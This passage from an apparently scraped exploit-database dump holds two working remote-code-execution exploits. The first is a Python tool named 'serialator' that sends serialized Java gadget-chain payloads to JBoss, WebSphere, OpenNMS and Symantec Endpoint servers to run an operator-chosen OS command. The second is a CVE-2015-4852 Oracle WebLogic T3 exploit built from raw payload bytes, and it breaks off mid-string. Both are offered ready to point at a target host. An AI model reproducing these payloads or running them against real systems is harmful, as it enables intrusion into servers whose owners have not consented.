6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E747400124C6A6176612F6C616E672F4F626A6563743B7870767200116A6176612E6C616E672E52756E74696D65000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000274000A67657452756E74696D65757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007400096765744D6574686F647571007E001E00000002767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707671007E001E7371007E00167571007E001B00000002707571007E001B00000000740006696E766F6B657571007E001E00000002767200106A6176612E6C616E672E4F626A656374000000000000000000000078707671007E001B7371007E0016757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017400\")\r\n \r\n cleng = len(_cmd)\r\n body_serObj += chr(cleng) + _cmd\r\n body_serObj += hex2raw3(\"740004657865637571007E001E0000000171007E00237371007E0011737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F40000000000010770800000010000000007878767200126A6176612E6C616E672E4F766572726964650000000000000000000000787071007E003A\")\r\n \r\n if SSL_On:\r\n webservice = httplib2.Http(disable_ssl_certificate_validation=True)\r\n URL_ADDR = \"%s://%s:%s\" % ('https',HOST,PORT)\r\n else:\r\n webservice = httplib2.Http()\r\n URL_ADDR = \"%s://%s:%s\" % ('http',HOST,PORT)\r\n headers = {\"User-Agent\":\"JBoss_RCE_POC\",\r\n \"Content-type\":\"application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue\",\r\n \"Content-length\":\"%d\" % len(body_serObj)\r\n }\r\n resp, content = webservice.request(URL_ADDR+\"/invoker/JMXInvokerServlet\", \"POST\", body=body_serObj, headers=headers)\r\n # print provided response.\r\n print(\"[i] Response received from target: %s\" % resp)\r\n \r\ndef websphere_attack(HOST, PORT, SSL_On, _cmd):\r\n # The below code is based on the websphere_java_serialize.nasl script within Nessus\r\n \"\"\"\r\n This function sets up the attack payload for IBM WebSphere\r\n \"\"\"\r\n serObj3 = hex2raw3(\"ACED00057372003273756E2E7265666C6563742E616E6E6F746174696F6E2E416E6E6F746174696F6E496E766F636174696F6E48616E646C657255CAF50F15CB7EA50200024C000C6D656D62657256616C75657374000F4C6A6176612F7574696C2F4D61703B4C0004747970657400114C6A6176612F6C616E672F436C6173733B7870737D00000001000D6A6176612E7574696C2E4D6170787200176A6176612E6C616E672E7265666C6563742E50726F7879E127DA20CC1043CB0200014C0001687400254C6A6176612F6C616E672F7265666C6563742F496E766F636174696F6E48616E646C65723B78707371007E00007372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E747400124C6A6176612F6C616E672F4F626A6563743B7870767200116A6176612E6C616E672E52756E74696D65000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000274000A67657452756E74696D65757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007400096765744D6574686F647571007E001E00000002767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707671007E001E7371007E00167571007E001B00000002707571007E001B00000000740006696E766F6B657571007E001E00000002767200106A6176612E6C616E672E4F626A656374000000000000000000000078707671007E001B7371007E0016757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017400\") # Setup initial parts of the payload packet\r\n cleng = len(_cmd) # Get the length of the payload\r\n serObj3 += chr(cleng) + _cmd # Convert the length to byte string, prepend to the payload and concatenate with the serialised payload.\r\n serObj3 += hex2raw3(\"740004657865637571007E001E0000000171007E00237371007E0011737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F40000000000010770800000010000000007878767200126A6176612E6C616E672E4F766572726964650000000000000000000000787071007E003A\") # Complete the payload packet\r\n serObjB64_3 = base64.b64encode(serObj3.encode('ascii', errors='ignore')) # Base64 encode the whole payload\r\n \r\n body = \"\"\"<?xml version='1.0' encoding='UTF-8'?>\r\n <SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\">\r\n <SOAP-ENV:Header ns0:JMXConnectorContext=\"rO0ABXNyAA9qYXZhLnV0aWwuU3RhY2sQ/irCuwmGHQIAAHhyABBqYXZhLnV0aWwuVmVjdG9y2Zd9W4A7rwEDAANJABFjYXBhY2l0eUluY3JlbWVudEkADGVsZW1lbnRDb3VudFsAC2VsZW1lbnREYXRhdAATW0xqYXZhL2xhbmcvT2JqZWN0O3hwAAAAAAAAAAF1cgATW0xqYXZhLmxhbmcuT2JqZWN0O5DOWJ8QcylsAgAAeHAAAAAKc3IAOmNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3IuSk1YQ29ubmVjdG9yQ29udGV4dEVsZW1lbnTblRMyYyF8sQIABUwACGNlbGxOYW1ldAASTGphdmEvbGFuZy9TdHJpbmc7TAAIaG9zdE5hbWVxAH4AB0wACG5vZGVOYW1lcQB+AAdMAApzZXJ2ZXJOYW1lcQB+AAdbAApzdGFja1RyYWNldAAeW0xqYXZhL2xhbmcvU3RhY2tUcmFjZUVsZW1lbnQ7eHB0AAB0AAhMYXAzOTAxM3EAfgAKcQB+AAp1cgAeW0xqYXZhLmxhbmcuU3RhY2tUcmFjZUVsZW1lbnQ7AkYqPDz9IjkCAAB4cAAAACpzcgAbamF2YS5sYW5nLlN0YWNrVHJhY2VFbGVtZW50YQnFmiY23YUCAARJAApsaW5lTnVtYmVyTAAOZGVjbGFyaW5nQ2xhc3NxAH4AB0wACGZpbGVOYW1lcQB+AAdMAAptZXRob2ROYW1lcQB+AAd4cAAAAEt0ADpjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLkpNWENvbm5lY3RvckNvbnRleHRFbGVtZW50dAAfSk1YQ29ubmVjdG9yQ29udGV4dEVsZW1lbnQuamF2YXQABjxpbml0PnNxAH4ADgAAADx0ADNjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLkpNWENvbm5lY3RvckNvbnRleHR0ABhKTVhDb25uZWN0b3JDb250ZXh0LmphdmF0AARwdXNoc3EAfgAOAAAGQ3QAOGNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3Iuc29hcC5TT0FQQ29ubmVjdG9yQ2xpZW50dAAYU09BUENvbm5lY3RvckNsaWVudC5qYXZhdAAcZ2V0Sk1YQ29ubmVjdG9yQ29udGV4dEhlYWRlcnNxAH4ADgAAA0h0ADhjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLnNvYXAuU09BUENvbm5lY3RvckNsaWVudHQAGFNPQVBDb25uZWN0b3JDbGllbnQuamF2YXQAEmludm9rZVRlbXBsYXRlT25jZXNxAH4ADgAAArF0ADhjb20uaWJtLndzLm1hbmFnZW1lbnQuY29ubmVjdG9yLnNvYXAuU09BUENvbm5lY3RvckNsaWVudHQAGFNPQVBDb25uZWN0b3JDbGllbnQuamF2YXQADmludm9rZVRlbXBsYXRlc3EAfgAOAAACp3QAOGNvbS5pYm0ud3MubWFuYWdlbWVudC5jb25uZWN0b3Iuc29hcC5TT0FQQ29ubmVjdG9yQ2xpZW50dAAYU09BUENvbm5lY3RvckNsaWVudC5qYXZhdAAOaW52b2tlVGVtcGxhdGVzcQB+AA4AAAKZdAA4Y29tLmlibS53cy5tYW5hZ2VtZW50LmNvbm5lY3Rvci5zb2FwLlNPQVBDb25uZWN0b3JDbGllbnR0ABhTT0FQQ29ubmVjdG9yQ2xpZW50LmphdmF0AAZpbnZva2VzcQB+AA4AAAHndAA4Y29tLmlibS53cy5tYW5hZ2VtZW50LmNvbm5lY3Rvci5zb2FwLlNPQVBDb25uZWN0b3JDbGllbnR0ABhTT0FQQ29ubmVjdG9yQ2xpZW50LmphdmF0AAZpbnZva2VzcQB+AA7/////dAAVY29tLnN1bi5wcm94eS4kUHJveHkwcHQABmludm9rZXNxAH4ADgAAAOB0ACVjb20uaWJtLndzLm1hbmFnZW1lbnQuQWRtaW5DbGllbnRJbXBsdAAUQWRtaW5DbGllbnRJbXBsLmphdmF0AAZpbnZva2VzcQB+AA4AAADYdAA9Y29tLmlibS53ZWJzcGhlcmUubWFuYWdlbWVudC5jb25maWdzZXJ2aWNlLkNvbmZpZ1NlcnZpY2VQcm94eXQAF0NvbmZpZ1NlcnZpY2VQcm94eS5qYXZhdAARZ2V0VW5zYXZlZENoYW5nZXNzcQB+AA4AAAwYdAAmY29tLmlibS53cy5zY3JpcHRpbmcuQWRtaW5Db25maWdDbGllbnR0ABZBZG1pbkNvbmZpZ0NsaWVudC5qYXZhdAAKaGFzQ2hhbmdlc3NxAH4ADgAAA/Z0AB5jb20uaWJtLndzLnNjcmlwdGluZy5XYXN4U2hlbGx0AA5XYXN4U2hlbGwuamF2YXQACHRpbWVUb0dvc3EAfgAOAAAFm3QAImNvbS5pYm0ud3Muc2NyaXB0aW5nLkFic3RyYWN0U2hlbGx0ABJBYnN0cmFjdFNoZWxsLmphdmF0AAtpbnRlcmFjdGl2ZXNxAH4ADgAACPp0ACJjb20uaWJtLndzLnNjcmlwdGluZy5BYnN0cmFjdFNoZWxsdAASQWJzdHJhY3RTaGVsbC5qYXZhdAADcnVuc3EAfgAOAAAElHQAHmNvbS5pYm0ud3Muc2NyaXB0aW5nLldhc3hTaGVsbHQADldhc3hTaGVsbC5qYXZhdAAEbWFpbnNxAH4ADv////50ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQAB2ludm9rZTBzcQB+AA4AAAA8dAAkc3VuLnJlZmxlY3QuTmF0aXZlTWV0aG9kQWNjZXNzb3JJbXBsdAAdTmF0aXZlTWV0aG9kQWNjZXNzb3JJbXBsLmphdmF0AAZpbnZva2VzcQB+AA4AAAAldAAoc3VuLnJlZmxlY3QuRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbHQAIURlbGVnYXRpbmdNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAAmN0ABhqYXZhLmxhbmcucmVmbGVjdC5NZXRob2R0AAtNZXRob2QuamF2YXQABmludm9rZXNxAH4ADgAAAOp0ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAAKbGF1bmNoTWFpbnNxAH4ADgAAAGB0ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAAEbWFpbnNxAH4ADgAAAE10ACJjb20uaWJtLndzc3BpLmJvb3RzdHJhcC5XU0xhdW5jaGVydAAPV1NMYXVuY2hlci5qYXZhdAADcnVuc3EAfgAO/////nQAJHN1bi5yZWZsZWN0Lk5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbHQAHU5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAHaW52b2tlMHNxAH4ADgAAADx0ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAACV0AChzdW4ucmVmbGVjdC5EZWxlZ2F0aW5nTWV0aG9kQWNjZXNzb3JJbXBsdAAhRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAGaW52b2tlc3EAfgAOAAACY3QAGGphdmEubGFuZy5yZWZsZWN0Lk1ldGhvZHQAC01ldGhvZC5qYXZhdAAGaW52b2tlc3EAfgAOAAACS3QANG9yZy5lY2xpcHNlLmVxdWlub3guaW50ZXJuYWwuYXBwLkVjbGlwc2VBcHBDb250YWluZXJ0ABhFY2xpcHNlQXBwQ29udGFpbmVyLmphdmF0ABdjYWxsTWV0aG9kV2l0aEV4Y2VwdGlvbnNxAH4ADgAAAMZ0ADFvcmcuZWNsaXBzZS5lcXVpbm94LmludGVybmFsLmFwcC5FY2xpcHNlQXBwSGFuZGxldAAVRWNsaXBzZUFwcEhhbmRsZS5qYXZhdAADcnVuc3EAfgAOAAAAbnQAPG9yZy5lY2xpcHNlLmNvcmUucnVudGltZS5pbnRlcm5hbC5hZGFwdG9yLkVjbGlwc2VBcHBMYXVuY2hlcnQAF0VjbGlwc2VBcHBMYXVuY2hlci5qYXZhdAAOcnVuQXBwbGljYXRpb25zcQB+AA4AAABPdAA8b3JnLmVjbGlwc2UuY29yZS5ydW50aW1lLmludGVybmFsLmFkYXB0b3IuRWNsaXBzZUFwcExhdW5jaGVydAAXRWNsaXBzZUFwcExhdW5jaGVyLmphdmF0AAVzdGFydHNxAH4ADgAAAXF0AC9vcmcuZWNsaXBzZS5jb3JlLnJ1bnRpbWUuYWRhcHRvci5FY2xpcHNlU3RhcnRlcnQAE0VjbGlwc2VTdGFydGVyLmphdmF0AANydW5zcQB+AA4AAACzdAAvb3JnLmVjbGlwc2UuY29yZS5ydW50aW1lLmFkYXB0b3IuRWNsaXBzZVN0YXJ0ZXJ0ABNFY2xpcHNlU3RhcnRlci5qYXZhdAADcnVuc3EAfgAO/////nQAJHN1bi5yZWZsZWN0Lk5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbHQAHU5hdGl2ZU1ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAHaW52b2tlMHNxAH4ADgAAADx0ACRzdW4ucmVmbGVjdC5OYXRpdmVNZXRob2RBY2Nlc3NvckltcGx0AB1OYXRpdmVNZXRob2RBY2Nlc3NvckltcGwuamF2YXQABmludm9rZXNxAH4ADgAAACV0AChzdW4ucmVmbGVjdC5EZWxlZ2F0aW5nTWV0aG9kQWNjZXNzb3JJbXBsdAAhRGVsZWdhdGluZ01ldGhvZEFjY2Vzc29ySW1wbC5qYXZhdAAGaW52b2tlc3EAfgAOAAACY3QAGGphdmEubGFuZy5yZWZsZWN0Lk1ldGhvZHQAC01ldGhvZC5qYXZhdAAGaW52b2tlc3EAfgAOAAABVHQAHm9yZy5lY2xpcHNlLmNvcmUubGF1bmNoZXIuTWFpbnQACU1haW4uamF2YXQAD2ludm9rZUZyYW1ld29ya3NxAH4ADgAAARp0AB5vcmcuZWNsaXBzZS5jb3JlLmxhdW5jaGVyLk1haW50AAlNYWluLmphdmF0AAhiYXNpY1J1bnNxAH4ADgAAA9V0AB5vcmcuZWNsaXBzZS5jb3JlLmxhdW5jaGVyLk1haW50AAlNYWluLmphdmF0AANydW5zcQB+AA4AAAGQdAAlY29tLmlibS53c3NwaS5ib290c3RyYXAuV1NQcmVMYXVuY2hlcnQAEldTUHJlTGF1bmNoZXIuamF2YXQADWxhdW5jaEVjbGlwc2VzcQB+AA4AAACjdAAlY29tLmlibS53c3NwaS5ib290c3RyYXAuV1NQcmVMYXVuY2hlcnQAEldTUHJlTGF1bmNoZXIuamF2YXQABG1haW5wcHBwcHBwcHB4\" xmlns:ns0=\"admin\" ns0:WASRemoteRuntimeVersion=\"8.5.5.7\" ns0:JMXMessageVersion=\"1.2.0\" ns0:JMXVersion=\"1.2.0\">\r\n </SOAP-ENV:Header>\r\n <SOAP-ENV:Body>\r\n <ns1:invoke xmlns:ns1=\"urn:AdminService\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\r\n <objectname xsi:type=\"ns1:javax.management.ObjectName\">rO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==</objectname>\r\n <operationname xsi:type=\"xsd:string\">getUnsavedChanges</operationname>\r\n <params xsi:type=\"ns1:[Ljava.lang.Object;\">%s</params>\r\n <signature xsi:type=\"ns1:[Ljava.lang.String;\">rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24=</signature>\r\n </ns1:invoke>\r\n </SOAP-ENV:Body>\r\n </SOAP-ENV:Envelope>\"\"\" % serObjB64_3 # Append the payload to the request body.\r\n \r\n if SSL_On:\r\n webservice = httplib2.Http(disable_ssl_certificate_validation=True)\r\n URL_ADDR = \"%s://%s:%s\" % ('https',HOST,PORT)\r\n else:\r\n webservice = httplib2.Http()\r\n URL_ADDR = \"%s://%s:%s\" % ('http',HOST,PORT)\r\n headers = {\"User-Agent\":\"WebSphere_RCE_POC\",\r\n \"Content-type\":\"text/xml; charset=\\\"UTF-8\\\"\",\r\n \"SOAPAction\":\"\\\"urn:AdminService\\\"\",\r\n \"Content-length\":\"%d\" % len(body)\r\n }\r\n print(\"[i] Sending attack payload to %s\" % URL_ADDR)\r\n resp, content = webservice.request(URL_ADDR+\"/\", \"POST\", body=body, headers=headers)\r\n # print provided response.\r\n print(\"[i] Response received from target: %s\" % resp)\r\n \r\nif __name__ == \"__main__\":\r\n \r\n #\r\n # Main function\r\n #\r\n if not sys.version_info >= (3, 0):\r\n sys,exit(\"[x] WARNING - this script requires Python 3.x. Exiting\")\r\n \r\n # Setup command line arguments\r\n cmdparser = argparse.ArgumentParser(prog=\"serialator\", usage=\"\"\"\r\n ____ _ _ _ \r\n / ___| ___ _ __(_) __ _| | __ _| |_ ___ _ __ \r\n \\___ \\ / _ \\ '__| |/ _` | |/ _` | __/ _ \\| '__|\r\n ___) | __/ | | | (_| | | (_| | || (_) | | \r\n |____/ \\___|_| |_|\\__,_|_|\\__,_|\\__\\___/|_|\r\n by Nikhil Sreekumar (@roo7break) v {version}\r\n \r\n Usage: python3 %(prog)s [options]\r\n \r\n Options:\r\n -t Target (required)\r\n -p Port (required)\r\n -c CMD (required)\r\n --serv Target Service (default: websphere)\r\n --ssl Use SSL (default: OFF)\r\n --test Test if target is vulnerable (default: OFF)\r\n \"\"\".format(version=version), formatter_class=argparse.RawTextHelpFormatter)\r\n cmdparser.add_argument(\"-t\", \"--target\", default=\"127.0.0.1\", help=\"Target host\", required=True)\r\n cmdparser.add_argument(\"-p\", \"--port\", default=\"\", type=int, help=\"Target port\", required=True)\r\n cmdparser.add_argument(\"-c\", \"--cmd\", default=\"\", help=\"OS command to execute\")\r\n cmdparser.add_argument(\"--serv\", default=\"websphere\", choices=[\"websphere\", \"opennms\", \"jboss\",\"symantec\"])\r\n cmdparser.add_argument(\"--ssl\", action=\"store_true\", help=\"Use SSL for target service\")\r\n cmdparser.add_argument(\"--test\", action=\"store_true\", help=\"Use to test for vulnerability\")\r\n \r\n cmdargs = cmdparser.parse_args()\r\n \r\n if cmdargs.test:\r\n answ = input(\"[i] Before we start, I highly recommend you start Wireshark (filter: icmp.type == 8) or ICMPListener, now. Ready? (y/yes) \")\r\n if answ.lower() == 'y' or answ.lower() == 'yes':\r\n print(\"[i] Awesome. Lets ask the target server to ping our system\")\r\n tgtos = input(\"[?] What do you think the target OS is (win/unix): \")\r\n if tgtos.lower == \"win\":\r\n host_ip = input(\"[?] Provide LHOST: \")\r\n print(\"[i] Windows target selected. Sending \\'ping -n 5 <attack_ip>'\\ to target.\")\r\n cmdargs.cmd == \"ping -n 5 %s\" % host_ip\r\n else:\r\n host_ip = input(\"[?] Provide LHOST: \")\r\n print(\"[i] Unix target selected. Sending \\'ping -c 5 <attack_ip>'\\ to target.\")\r\n cmdargs.cmd == \"ping -n 5 %s\" % host_ip\r\n else:\r\n print(\"[i] Lazy bugger.. right, I am gonna continue anyway.\")\r\n \r\n if cmdargs.serv == \"websphere\":\r\n print(\"[i] WebSphere selected as target app.\")\r\n if cmdargs.test:\r\n websphere_attack(cmdargs.target, cmdargs.port, cmdargs.ssl, cmdargs.cmd)\r\n else:\r\n if cmdargs.cmd == None:\r\n sys.exit(\"[x] You didnt provide any command to run. Exiting..\")\r\n websphere_attack(cmdargs.target, cmdargs.port, cmdargs.ssl, cmdargs.cmd)\r\n elif cmdargs.serv == \"opennms\":\r\n print(\"[i] OpenNMS selected as target app.\")\r\n if cmdargs.test:\r\n opennms_attack(cmdargs.target, cmdargs.port, cmdargs.cmd)\r\n else:\r\n if cmdargs.cmd == None:\r\n sys.exit(\"[x] You didnt provide any command to run. Exiting..\")\r\n opennms_attack(cmdargs.target, cmdargs.port, cmdargs.cmd)\r\n elif cmdargs.serv == \"jboss\":\r\n print(\"[i] JBoss selected as target app.\")\r\n if cmdargs.test:\r\n jboss_attack(cmdargs.target, cmdargs.port, cmdargs.ssl, cmdargs.cmd)\r\n else:\r\n if cmdargs.cmd == None:\r\n sys.exit(\"[x] You didnt provide any command to run. Exiting..\")\r\n jboss_attack(cmdargs.target, cmdargs.port, cmdargs.ssl, cmdargs.cmd)\r\n else:\r\n print(\"[i] Symantec Endpoint selected as target app.\")\r\n if cmdargs.test:\r\n symantec_endpoint_attack(cmdargs.target, cmdargs.port, cmdargs.ssl, cmdargs.cmd)\r\n else:\r\n if cmdargs.cmd == None:\r\n sys.exit(\"[x] You didnt provide any command to run. Exiting..\")\r\n symantec_endpoint_attack(cmdargs.target, cmdargs.port, cmdargs.ssl, cmdargs.cmd)\r\n \r\n print(\"[i] Thank you for using this tool. Contact author for any comments.\")\n\n# 0day.today [2018-04-30] #", "sourceHref": "https://0day.today/exploit/30269", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-02T05:07:52", "description": "Exploit for java platform in category remote exploits", "cvss3": {}, "published": "2017-09-28T00:00:00", "type": "zdt", "title": "Oracle WebLogic Server 10.3.6.0 - Java Deserialization Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-4852"], "modified": "2017-09-28T00:00:00", "id": "1337DAY-ID-28661", "href": "https://0day.today/exploit/description/28661", "sourceData": "# Exploit Title: [Oracle WebLogic Server Java Deserialization Remote Code Execution]\r\n# Date: [27/09/2017]\r\n# Exploit Author: [SlidingWindow] , Twitter: @kapil_khot\r\n# Vulnerability Author: FoxGloveSecurity\r\n# Vendor Homepage: [http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html]\r\n# Affetcted Versions: [Oracle WebLogic Server, versions 10.3.6.0, 12.1.2.0, 12.1.3.0 and 12.2.1.0]\r\n# Tested on: [Oracle WebLogic Server version 10.3.6.0 running on a Docker image Ubuntu 14.04.4 LTS, Trusty Tahr]\r\n# CVE : [CVE-2015-4852]\r\n \r\n'''\r\nThis exploit tests the target Oracle WebLogic Server for Java Deserialization RCE vulnerability. The ysoserial payload causes the target to send\r\nPing requests to attacking machine. You can monitor ICMP ECHO requests on your attacking machine using TCPDump to know if the exploit was successful.\r\nFeel free to modify the payload(chunk2) with that of your choice. Don't worry about modiyfing the payload length each time you change the payload as \r\nthis script will do it for you on the fly.\r\n \r\nNote: I tried to get a bash one liner reverse shell payload working but that did not work on my target for some reason. Please let me know if you get it working :)\r\n'''\r\n \r\n#!/usr/bin/env python\r\nimport socket\r\nimport sys\r\nimport struct\r\nfrom binascii import unhexlify\r\n \r\nprint \"\\n[+]Hope you've started monitoring ICMP ECHO requests on your attacking machine before running this exploit...\"\r\nprint \"[+]Here is the command:\\n\\t tcpdump -nni <eth-adapter> -e icmp[icmptype] == 8\\n\"\r\n \r\nif len(sys.argv) < 2:\r\n print \"\\n[+]Please provide target IP and Port...\"\r\n print \"[+]Usage:\\n\\t ./weblogic_linuxPing.py <target_ip> <target_port>\"\r\n sys.exit()\r\n \r\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nserver_address = (sys.argv[1], int(sys.argv[2]))\r\nprint '[+]Connecting to %s port %s' % server_address\r\nsock.connect(server_address)\r\n \r\n#Send headers\r\nheaders='t3 12.2.1\\nAS:255\\nHL:19\\nMS:10000000\\nPU:t3://us-l-breens:7001\\n\\n'\r\nprint '[+]Sending\\n\"%s\"' % headers\r\nsock.sendall(headers)\r\n \r\ndata = sock.recv(1024)\r\nprint >>sys.stderr, '\\n[+]Received \"%s\"' % data\r\n \r\n \r\n#00000b4d (2893 bytes in decimal) is the TOTAL length of the payload(all chunks) that includes ysoserial payload.\r\n#We will calculate the TOTAL length of payload (first four bytes in 'chunk1') later as using different ysoserial payload changes the length\r\nchunk1='\\x00\\x00\\x0b\\x4d\\x01\\x65\\x01\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x71\\x00\\x00\\xea\\x60\\x00\\x00\\x00\\x18\\x43\\x2e\\xc6\\xa2\\xa6\\x39\\x85\\xb5\\xaf\\x7d\\x63\\xe6\\x43\\x83\\xf4\\x2a\\x6d\\x92\\xc9\\xe9\\xaf\\x0f\\x94\\x72\\x02\\x79\\x73\\x72\\x00\\x78\\x72\\x01\\x78\\x72\\x02\\x78\\x70\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x70\\x70\\x70\\x70\\x70\\x70\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x70\\x06\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1d\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x43\\x6c\\x61\\x73\\x73\\x54\\x61\\x62\\x6c\\x65\\x45\\x6e\\x74\\x72\\x79\\x2f\\x52\\x65\\x81\\x57\\xf4\\xf9\\xed\\x0c\\x00\\x00\\x78\\x70\\x72\\x00\\x24\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x50\\x61\\x63\\x6b\\x61\\x67\\x65\\x49\\x6e\\x66\\x6f\\xe6\\xf7\\x23\\xe7\\xb8\\xae\\x1e\\xc9\\x02\\x00\\x09\\x49\\x00\\x05\\x6d\\x61\\x6a\\x6f\\x72\\x49\\x00\\x05\\x6d\\x69\\x6e\\x6f\\x72\\x49\\x00\\x0b\\x70\\x61\\x74\\x63\\x68\\x55\\x70\\x64\\x61\\x74\\x65\\x49\\x00\\x0c\\x72\\x6f\\x6c\\x6c\\x69\\x6e\\x67\\x50\\x61\\x74\\x63\\x68\\x49\\x00\\x0b\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x50\\x61\\x63\\x6b\\x5a\\x00\\x0e\\x74\\x65\\x6d\\x70\\x6f\\x72\\x61\\x72\\x79\\x50\\x61\\x74\\x63\\x68\\x4c\\x00\\x09\\x69\\x6d\\x70\\x6c\\x54\\x69\\x74\\x6c\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x4c\\x00\\x0a\\x69\\x6d\\x70\\x6c\\x56\\x65\\x6e\\x64\\x6f\\x72\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x0b\\x69\\x6d\\x70\\x6c\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x71\\x00\\x7e\